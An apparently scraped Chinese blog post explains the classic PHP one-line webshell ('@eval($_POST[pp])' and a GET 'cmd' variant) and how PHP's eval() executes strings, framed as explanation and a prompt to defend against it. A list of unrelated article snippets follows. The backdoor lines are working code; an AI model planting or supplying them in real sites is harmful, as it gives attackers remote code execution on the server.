eval函数 php_PHP的一句话木马代码和函数eval的简介

format,png

大清早的刚从床上爬起来。雨落就跑来找我问我这段代码是什么意思<?php @eval($_POST[pp]);?>看了一下,post接收pp的值,抑制错误输出。呵呵开个玩笑,其实不是这么简单,这是一段PHP木马代码,也就是我们所说的后门程序

为什么说这段代码是后门程序?

其实这段代码属于基础类的一句话,功能仅限于验证漏洞了,实际中太容易被查出来了,也就是早上雨落直接带图说检测到木马文件

这个是PHP最常见的一句话木马的源码,通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算

就这一句话害死人,这样任何人都可以post任何文件上来,所以要做好防范

eval函数

eval() 函数把字符串按照 PHP 代码来执行

该字符串必须是合法的 PHP 代码,且必须以分号结尾

如果没有在代码字符串中调用 return 语句,则返回 NULL

如果代码中存在解析错误,则 eval() 函数返回 false

eval函数的一般用法

一般用法也就是平时我们所用的,但是感觉我都不用这个函数,作用相当于Python中的format函数,格式化字符串

$string = "beautiful";

$time = "summer";

$str = 'This is a $string $time morning!';

echo $str. "
";

eval("\$str = \"$str\";");

echo $str;

?>

结果输出:

This is a $string $time morning!

This is a beautiful summer morning!

eval函数的特殊用法

这就是二般人的用法了,一句话木马下面我们直接来看实例,新建一个php文件,写入如下代码

@eval($_GET["cmd"]);

?>

加上@符来抑制错误输出,来访问?cmd=echo 'hello,world!';这个路径,就会看到输出

8964bc5b76b60ad37839c0ee3bfd0450.png

查看PHP的信息:pathinfo()

cc6bc060ddb35d69022e60d6b3cdc163.png

post提交同理,原理就是上面说的,将字符串按照 PHP 代码来执行了,这是最简单的一种PHP一句话木马程序代码,也感觉是最弱智的。。。

任何个人或团体,未经允许禁止转载本文:《PHP的一句话木马代码和函数eval的简介》,谢谢合作!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/395035.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

linux安装python_Python - 爱豆

Python下载Python最新源码&#xff0c;二进制文档&#xff0c;新闻资讯等可以在Python的官网查看到&#xff1a;Python官网&#xff1a;你可以在以下链接中下载 Python 的文档&#xff0c;你可以下载 HTML、PDF 和 PostScript 等格式的文档。Python文档下载地址&#xff1a;doc…

如何将您的#100DaysOfCode登录转换为视觉体验

by Joe Warren通过乔沃伦 如何将您的&#xff03;100DaysOfCode登录转换为视觉体验 (How to Transform Your #100DaysOfCode Log Into a Visual Experience) Learning how to code is an unrivaled modern experience. As an aspiring developer, no matter what level you’r…

Python中集合(set)的操作及一些比较常见的用法

Python除了List、Tuple、Dict等常用数据类型外&#xff0c;还有一种数据类型叫做集合&#xff08;set&#xff09;&#xff0c;集合的最大特点是&#xff1a;集合里边的元素是不可重复的并且集合内的元素还是无序的&#xff0c;所以一般情况下集合常用的两个场景是&#xff1a;…

php中的图像下载函数,PHP实现的下载远程图片自定义函数分享

/*** PHP下载远程图片到本地** param $url string 远程文件地址* param $filename string 保存后的文件名(为空时则为随机生成的文件名&#xff0c;否则为原文件名)* param $fileType array 允许的文件类型* param $dirName string 文件保存的路径(路径其余部分根据时间系统自动…

Linux 文件的压缩与解压

1. tar结尾压缩命令 [roottest ~]# tar -cvf grub.tar /boot/grub/ 查看压缩包文件 [roottest ~]# tar -vtf grub.tar 解压文件 #tar -xvf grub.tar # tar -xvf grub.tar -C 解压目录 2. gz结尾压缩命令 # tar -zcvf grub.tar.gz /boot/grub gz结尾解压命令 #tar -zxvf gr…

深度学习笔记-卷积神经网络CNN与循环神经网络RNN有什么区别?

转载 https://blog.csdn.net/weixin_35227692/article/details/79223536转载于:https://www.cnblogs.com/USTBlxq/p/10445268.html

参考框架 系统 基准_带有基准的前端框架的实际比较

参考框架 系统 基准by Jacek Schae由Jacek Schae 带有基准的前端框架的实际比较 (A Real-World Comparison of Front-End Frameworks with Benchmarks) UPDATE: There is a newer version of this article更新&#xff1a;本文有较新的版本 A Real-World Comparison of Front…

ppt复制切片器_零基础小白自学PPT快速入门到精通(上)

零基础小白如何自学PPT快速入门到精通呢&#xff1f;40个保姆级小技巧助力你高效掌握PPT基础操作&#xff01;PPT在学习与工作中的应用越来越广泛&#xff1a;在学校时免不了要做毕业答辩、毕业论文&#xff0c;工作中时常要进行复盘总结、工作汇报、推广方案&#xff0c;有时甚…

网络安全初创公司SafeBreach获1500万美元A轮融资

今天&#xff0c;网络安全初创公司 SafeBreach 宣布完成1500 万美元 A 轮融资&#xff0c;新投资者德国电信、惠普公司、 Maverick Ventures 及现有投资者 Sequoia Capital 和 Shlomo Kramer 参投。公司计划利用本轮融资加大研发力度&#xff0c;扩大销售及营销团队&#xff0c…

php网站分区,PHP - Manual: 分区和分片 (官方文档)

分区和分片数据库群组是由于各种各样的原因建立的&#xff0c;他可以提升处理能力、容忍错误&#xff0c;并且提升大量服务器同时工作的的性能。群组有时会组合分区和共享功能&#xff0c;来将大量复杂的任务分拆成更加简单的任务&#xff0c;更加可控的单元。插件可以支持各种…

webBroser获取cookie

//取当前webBrowser登录后的Cookie值 [DllImport("wininet.dll", CharSet CharSet.Auto, SetLastError true)]static extern bool InternetGetCookieEx(string pchURL, string pchCookieName, StringBuilder pchCookieData, ref int pcchCookieData, int dwFlags…

了解Linux操作系统发展阶段

一、硬件与软件发展历史 计算机由硬件和软件组成结构 二、Linux的发展史 Linux 操作系统是Unix操作系统的一种克隆系统。它诞生于1991年的10月5日&#xff08;只是第一次正式向外公布的时间&#xff09;。以后借助于Internet网络&#xff0c;并经过全世界各地计算机爱好者的共同…

c gui qt 4编程第二版_面试官问Linux下如何编译C程序,如何回答?为你编译演示

文章来源&#xff1a;嵌入式大杂烩 作者&#xff1a;ZhengNLWindows下常用IDE来编译&#xff0c;Linux下直接使用gcc来编译&#xff0c;编译过程是Linux嵌入式编程的基础&#xff0c;也是嵌入式高频基础面试问题。一、命令行编译及各个细分编译过程hello.c示例代码&#xff1a;…

Python基础-----列表、元组、集合(2)

raw_input ##字符类型input##数值类型##格式化输出注释切片s[2:5]##切片从2开始到5&#xff0c;不包括5[kioskfoundation39 mnt]$ pythonPython 2.7.5 (default, Oct 11 2015, 17:47:16) [GCC 4.8.3 20140911 (Red Hat 4.8.3-9)] on linux2Type "help", "copyri…

调用lambda_如何使用Lambda调用上下文动态设置超时

调用lambdaby Yan Cui崔燕 如何使用Lambda调用上下文动态设置超时 (How to set timeouts dynamically using Lambda invocation context) With API Gateway and Lambda, you’re forced to use short timeouts on the server-side:使用API​​ Gateway和Lambda&#xff0c;您不…

php+tp框架+API,php - tp框架能开发API接口吗

怪我咯2017-04-10 17:12:231楼TP的controller其实有很多种的HproseController,JsonRpcController,RestController,RpcController,YarController我拿RestController给你介绍一下RESTFul方法的操作方法定义主要区别在于&#xff0c;需要对请求类型和资源类型进行判断&#xff0c;…

OTL翻译(9) --常量的SQL语句

常量的SQL语句 一个没有绑定变量的SQL语句、SQL语句块或是存储过程就被称为常量的SQL语句。OTL通过一个静态的函数来执行这样的SQL语句。 例如&#xff1a; // static otl_cursor::direct_exec()otl_cursor::direct_exec(db, // connect object"create table test_tab(f1 …

[HNOI2016]网络 树链剖分,堆

[HNOI2016]网络 LG传送门 表示乱搞比正解难想。 整体二分很好想吧。 但是为了好写快乐&#xff0c;我们选择三个\(\log\)的乱搞。 先树剖&#xff0c;线段树套堆维护区间最大值。对于一次修改&#xff0c;如果是插入&#xff0c;就把树上除了这条链的地方加上这个重要度&#x…

python压缩文件为zip-python 压缩文件为zip后删除原文件

压缩.log 文件为zip后删除原文件 需要注意&#xff1a;本人作为小白&#xff0c;该脚本需要和.log在一起&#xff0c;后面有时间需要改正。 #!/usr/local/python/bin/python #-*-codingutf8 -*- import time import os import sys import zipfile N 7 #设置删除多少天前的文件…

css text-align-last设置末尾文本对齐方式

text-align-last&#xff1a;auto | start | end | left | right | center | justify auto&#xff1a; 无特殊对齐方式。 left&#xff1a; 内容左对齐。 center&#xff1a; 内容居中对齐。 right&#xff1a; 内容右对齐。 justify&#xff1a; 内容两端对齐。 start&#x…